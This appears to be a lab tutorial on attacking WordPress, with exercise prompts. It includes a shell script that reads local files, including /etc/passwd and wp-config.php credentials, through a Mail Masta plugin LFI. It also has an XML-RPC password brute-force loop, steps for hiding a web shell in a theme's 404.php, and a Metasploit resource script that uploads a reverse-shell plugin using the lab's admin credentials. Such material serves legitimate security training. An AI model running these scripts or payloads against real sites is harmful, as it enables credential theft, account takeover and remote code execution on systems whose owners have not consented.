🧊Exploitation
Vulnerable Plugin
Suppose a WPScan run identified an outdated theme or plugin that is known to be vulnerable to SQL injection and Local File Inclusion (LFI).
We can verify whether the LFI is exploitable using the corresponding Exploit-DB report. It states that any unauthenticated user can read local files through the path /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd (the value of the pl parameter is included directly by the script), either in a browser or with cURL:
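The check as a small script, added here as an example rather than taken from the original page or the exploit report. It requests /etc/passwd through the vulnerable pl parameter and only reports success if the body actually looks like a passwd file, so a 404 page or a WAF block page is not mistaken for a working LFI. The hostname in TARGET is an assumption.

```sh
#!/bin/sh
# Added example: confirm the Mail Masta LFI described above.
# TARGET is an assumed hostname; override it in the environment.
TARGET="${TARGET:-http://blog.inlanefreight.local}"
LFI_PATH="/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php"

# Succeeds (exit 0) only if stdin contains a root entry in passwd format:
# root:<pw>:0:0:... -- guards against treating an HTML error page as a hit.
looks_like_passwd() {
  grep -qE '^root:[^:]*:0:0:'
}

# Read an arbitrary file through the vulnerable ?pl= parameter.
lfi_read() {
  curl -s "${TARGET}${LFI_PATH}?pl=$1"
}

# End-to-end check: fetch /etc/passwd and validate the response.
verify_lfi() {
  if lfi_read /etc/passwd | looks_like_passwd; then
    echo "[+] LFI confirmed: /etc/passwd readable without authentication"
    return 0
  fi
  echo "[-] LFI not confirmed (patched plugin, WAF, or wrong path?)"
  return 1
}
```

Once confirmed, the same lfi_read function can pull other files the web server user can read, for instance the site's wp-config.php (its location depends on the web root, which this script does not assume), which holds the database credentials.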
User Bruteforce
WPScan supports two kinds of login brute-force attack: xmlrpc and wp-login. The wp-login method posts credentials to the normal WordPress login page (/wp-login.php), while the xmlrpc method uses the WordPress XML-RPC API, sending authenticated method calls to /xmlrpc.php. WPScan picks one automatically, favouring XML-RPC when /xmlrpc.php is enabled, and the choice can be forced with --password-attack.
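The two WPScan invocations, plus the XML-RPC exchange the xmlrpc method is built on, as an added example (this is not WPScan's code, and the hostname in TARGET is an assumption). Each xmlrpc guess is a wp.getUsersBlogs call, which requires a valid username/password pair: a wrong pair comes back as a fault with faultCode 403 and "Incorrect username or password.", a right pair returns the user's blog list. That response difference is the login oracle.

```sh
#!/bin/sh
# Added example: WPScan's two attack paths and the raw xmlrpc login oracle.
TARGET="${TARGET:-http://blog.inlanefreight.local}"   # assumed hostname

# 1) WPScan, forcing each method explicitly (flags from wpscan 3.x).
wpscan_wp_login() {   # usage: wpscan_wp_login roger rockyou.txt
  wpscan --url "$TARGET" --usernames "$1" --passwords "$2" --password-attack wp-login
}
wpscan_xmlrpc() {     # usage: wpscan_xmlrpc roger rockyou.txt
  wpscan --url "$TARGET" --usernames "$1" --passwords "$2" --password-attack xmlrpc
}

# 2) What one xmlrpc guess looks like on the wire: wp.getUsersBlogs(user, pass).
xmlrpc_login_body() {
  cat <<EOF
<?xml version="1.0"?>
<methodCall>
  <methodName>wp.getUsersBlogs</methodName>
  <params>
    <param><value><string>$1</string></value></param>
    <param><value><string>$2</string></value></param>
  </params>
</methodCall>
EOF
}

# Send a single guess by hand.
xmlrpc_try() {        # usage: xmlrpc_try roger password123
  xmlrpc_login_body "$1" "$2" |
    curl -s -X POST -H 'Content-Type: text/xml' --data-binary @- "${TARGET}/xmlrpc.php"
}

# Classify the server's answer: a <fault> with faultCode means the pair was
# rejected; a blog list (contains isAdmin) means the credentials are valid.
classify_xmlrpc_response() {
  resp=$(cat)
  case "$resp" in
    *'<name>faultCode</name>'*) echo invalid ;;
    *isAdmin*)                  echo valid ;;
    *)                          echo unknown ;;
  esac
}

# Manual loop over a wordlist, same logic WPScan runs in parallel.
xmlrpc_bruteforce() { # usage: xmlrpc_bruteforce roger rockyou.txt
  while IFS= read -r pw; do
    if [ "$(xmlrpc_try "$1" "$pw" | classify_xmlrpc_response)" = valid ]; then
      echo "[+] $1:$pw"; return 0
    fi
  done < "$2"
  return 1
}
```

The "unknown" branch matters in practice: a 403 from a WAF or a disabled xmlrpc.php also lacks faultCode, and treating that as a hit would produce false positives.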
Perform a brute-force attack against the user "roger" on your target with the wordlist "rockyou.txt". Submit the user's password as the answer.
RCE via the Theme Editor
With administrative access to WordPress, we can edit a theme's PHP source and make it execute system commands. Once logged in, click Appearance on the side panel and select Theme Editor. This page allows editing the PHP files of any installed theme directly.
The active theme here is Transportex, so an unused theme such as Twenty Seventeen should be chosen instead: a typo in the live theme would break the site for every visitor and draw attention.
Choose the theme and click Select. Next, pick a non-critical file such as 404.php and add a web shell to it.
The web shell is then reachable through the theme's 404.php with a cmd parameter, e.g. /wp-content/themes/twentyseventeen/404.php?cmd=id, because theme files are served straight from their directory under /wp-content/themes/.
We can check this with the following cURL command:
Use the credentials for the admin user [admin:sunshine1] and upload a web shell to your target. Once you have access to the target, obtain the contents of the "flag.txt" file in the home directory of the "wp-user" user.
Attacking with Metasploit
To obtain a reverse shell we can use the wp_admin_shell_upload module, which logs in with valid administrator credentials, uploads the payload as a plugin and triggers it. We can easily search for it inside msfconsole:
Once we set all of the options for this module (target, credentials and the listener address) and hit run, it will launch a reverse shell.
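The same run as a resource script, so the option set is reproducible rather than typed interactively. This is an added example, not Metasploit's own code: the module path and option names are the real ones for exploit/unix/webapp/wp_admin_shell_upload, the credentials are the exercise's admin:sunshine1, and the RHOSTS/LHOST addresses are placeholders.

```sh
#!/bin/sh
# Added example: drive wp_admin_shell_upload from an msfconsole resource file.
RHOSTS="${RHOSTS:-10.10.10.10}"   # assumed target address
LHOST="${LHOST:-10.10.14.1}"      # assumed attacker address

# Emit the resource script for a given target and listener address.
msf_rc() {            # usage: msf_rc <rhosts> <lhost>
  cat <<EOF
use exploit/unix/webapp/wp_admin_shell_upload
set RHOSTS $1
set RPORT 80
set TARGETURI /
set USERNAME admin
set PASSWORD sunshine1
set LHOST $2
set LPORT 4444
run
EOF
}

# Write the script and launch msfconsole quietly on it.
run_exploit() {
  msf_rc "$RHOSTS" "$LHOST" > wp_shell.rc
  msfconsole -q -r wp_shell.rc
}
```

If the site is only reachable by name (a virtual host rather than the bare IP), add a set VHOST line with the hostname before run; otherwise WordPress may redirect the login and the upload never happens.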